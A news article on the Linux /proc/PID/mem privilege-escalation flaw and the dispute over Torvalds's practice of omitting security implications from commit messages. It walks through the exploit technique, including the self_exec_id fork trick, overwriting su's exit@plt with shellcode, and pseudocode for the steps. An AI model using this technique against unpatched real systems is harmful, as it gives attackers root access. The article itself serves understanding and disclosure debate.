A /proc/PID/mem vulnerability
A privilege escalation in the kernel is always a serious threat that leads kernel hackers and distributions to scramble to close the hole quickly. That's exactly what happened after a January 17 report from Jüri Aedla to the closed kernel security mailing list. But most people didn't learn of the hole from Aedla (since he posted to a closed list), but instead from Jason Donenfeld (aka zx2c4) who posted a detailed look at the flaw on January 22. The fix was made by Linus Torvalds and went into the mainline on January 17, though with a commit message that obfuscated the security implications—something that didn't sit well with some.
The problem and exploit
The problem itself stems from the removal of the restriction on writes to /proc/PID/mem that was merged for the 2.6.39 kernel. It was part of a patch set that was specifically targeted at allowing debuggers to write to the memory of processes easily via the /proc/PID/mem file. Unfortunately, it left open a hole that Aedla and Donenfeld (at least) were able to exploit.
The posting by Donenfeld is worth a read for those interested in how exploits of this sort are created. The problem starts with the fact that the open() call for /proc/PID/mem does no additional checking beyond the normal VFS permissions before returning a file descriptor. That will prove to be a mistake, and one that Torvalds's fix remedies. Instead of checks at open() time, the code would check in write() and only allow writing if the process being written to is the same as the process doing the writing (i.e. task == current).
That restriction seems like it would make an exploit difficult, but it can be avoided with an exec() and coercing the newly run program to do the writing to itself. That will be dangerous if the newly run program is a setuid executable for example. But there is another test that is meant to block that particular path, by testing that current->self_exec_id has the same value as it did at open() time. self_exec_id is incremented every time that a process does an exec(), so it will definitely be different after executing the setuid binary. But, since it is simply incremented, one can arrange (via fork()) to have a child process with the same self_exec_id as the main process after the setuid exec() is done.
The child with the "correct" self_exec_id value (which it gets by doing an exec()) can then open the parent's /proc/PID/mem file (since there are no extra checks on the open()) and pass the descriptor back to the parent via Unix sockets. The parent then needs to arrange that the setuid executable writes to that file descriptor once a seek() to the proper address has been done. Finding that proper address and getting the binary to write to the fd are the final pieces of the puzzle.
Donenfeld's example uses su because it is not compiled as a position-independent executable (PIE) for most distributions, which makes it easier to figure out which address to use. He exploits the fact that su prints an error message when it is passed an unknown username and the error message helpfully prints the username passed. That allows the exploit to pass shellcode (i.e. binary machine language that spawns a shell when executed) as the argument to su.
After printing the error message, su calls the exit() function (really exit@plt), which is what Donenfeld's exploit overwrites. It finds the address of the function using objdump, subtracts the length of the error message that gets printed before the argument, and seeks the file to that location. It uses dup2() to connect stderr to the /proc/PID/mem file descriptor and execs su "shellcode".
In pseudocode, it might look something like this:
if (!child && fork()) { /* child flag set based on -c */
/* first program invocation, this is parent, wait for fd from child */
fd = recv_fd(); /* get the fd from the child */
dup2(2, 15);
dup2(fd, 2); /* make fd be stderr */
lseek(fd, offset); /* offset to overwrite location */
exec("/bin/su", shellcode); /* will have self_exec_id == 1 */
}
else if (!child) {
/* this is the child from the fork(), exec with child flag */
exec("thisprog", "-c"); /* this program with -c (child) */
}
else {
/* child after exec, will have self_exec_id == 1 */
fd = open("/proc/PPID/mem", O_RDWR); /* open parent PID's mem file */
send_fd(fd); /* send the fd to the parent */
}
Of course Aedla's proof-of-concept
or Donenfeld's exploit
code are likely to be even more instructive.
It's obviously a complicated multi-step process, but it is also a completely reliable way to get root privileges. Updates to Donenfeld's post show exploits for distributions like Fedora that do build su as a PIE, or for Gentoo where the read permissions on setuid binaries have been removed so objdump can't be used to find the address of the exit function. For Fedora, gpasswd can be substituted as it is not built as a PIE, while on Gentoo, ptrace() can be used to find the needed address. While it was believed that address space layout randomization (ASLR) for PIEs would make exploitation much more difficult, that proved to be only a small hurdle, at least on 32-bit systems.
The fix and reactions
The fix hit the mainline without any coordination with Linux
distributions. Kees Cook, who works on ChromeOS security (and
formerly was a member of the Ubuntu security team), told LWN that Red Hat has a person on the closed
kernel security mailing list, so it was aware of the problem but did not
share that information on the Linux distribution security list. "I've been told this will
change in the future, but I'm worried it will be overlooked again
",
he said. The first indication that
other distributions had was likely from Red Hat's Eugene Teo's request for a CVE on the
oss-security mailing list.
As Cook points out, the abrupt public disclosure of the bug (via a mainline commit) runs counter to the policy described in the kernel's Documentation/SecurityBugs file, where the default policy is to leave roughly seven days between reports to the mailing list and public disclosure to allow time for vendors to fix the problem. Cook is concerned that bugs reported to security@kernel.org are not being handled reasonably:
The "just a bug" refers to statements that Torvalds has made over the years about security bugs being no different than any other kind of bug. In email, Torvalds described it this way:
In keeping with that philosophy, Torvalds does not disclose the security
relevance of a fix in the commit message: "I think the whole 'mark this patch as having security implications' is
pure and utter garbage
". Even if there is a known security problem
that is being fixed, his commit
messages do not reflect that, as with the message for the
/proc/PID/mem fix:
This changes it to do the permission checks at open time, and instead of tracking the process, it tracks the VM at the time of the open. That simplifies the code a lot, but does mean that if you hold the file descriptor open over an execve(), you'll continue to read from the _old_ VM.
Torvalds's commit message stands in pretty stark contrast to Aedla's report to security@kernel.org (linked above):
This "masking" of the actual reason for a commit doesn't sit well with
either Cook or Teo (who also responded to an email query). Cook "cannot overstate how much I am
against this kind of masking
", while Teo pointed out that this
particular bug is in no way unique:
Both Teo and Cook were in agreement that disclosing what is known about a fix at the time it is applied can only help distributions and others trying to track kernel development. Torvalds, on the other hand, is concerned about attackers reading commit messages, which could lead to more attacks against Linux systems. He has a well-known contempt for security "clowns" that seems to also factor into his reasoning:
Both the security camps hate me. The full disclosure people think I try to hide things (which is true), while the embargo people think I despise their corrupt arses (which is also true).
The strange thing is that by explicitly not putting the known security implications of a patch into the commit message, Torvalds is treating security bugs differently. They are no longer "just bugs" because some of the details of the bug are being purposely omitted. That may make it difficult for "black hats"—though it would be somewhat surprising if it did—but it definitely makes it more difficult for those who are trying to keep Linux users secure. Worse yet, it makes it more difficult down the road when someone is looking at a commit (or reversion) in isolation because they may miss out on some important context.
Silent security fixes are a hallmark of proprietary software, and Torvalds's policy resembles that to some extent. It could be argued (and presumably would be by Torvalds and others) that the fixes aren't silent since they go into a public repository and that is true—as far as it goes. By deliberately omitting important information about the bug, which is not done for most or all other bugs, perhaps they aren't so much silent as they are "muted" or, sadly, "covered up". There is definitely a lot of validity to Torvalds's complaints about the security "circus", but his reaction to that circus may not be in the best interests of the kernel community either.
| Index entries for this article | |
|---|---|
| Kernel | Security/Vulnerabilities |
| Security | Linux kernel |
| Security | Vulnerabilities/Privilege escalation |